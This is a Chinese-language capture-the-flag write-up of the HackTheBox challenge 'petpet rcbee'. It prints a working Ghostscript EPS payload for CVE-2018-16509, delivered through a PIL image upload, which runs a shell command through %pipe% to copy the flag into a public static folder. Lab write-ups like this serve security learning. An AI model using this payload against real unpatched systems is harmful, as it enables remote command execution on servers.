HTB - hackthebox- petpet rcbee

由 admin 发布

petpet rcbee

Tags: CVE-2018-16509, Python, RCE

下载源码后在 util.py 中可以看到网站会对上传的图片使用 Python 中 PIL 库进行一些修改

得到一张 gif 图片

Untitled

读了读代码没有发现有漏洞的地方,目前得到的信息只有

python 编写 使用 PIL 处理图片

漏洞利用

在 Google 搜索相关利用后找到了,CVE-2018-16509

Python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞

参考 https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509 修改 Payload

Payload

%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%cat flag >> /app/application/static/petpets/yutian.txt) currentdevice putdeviceprops

上传之后访问就可以得到 flag


暂无评论

发表评论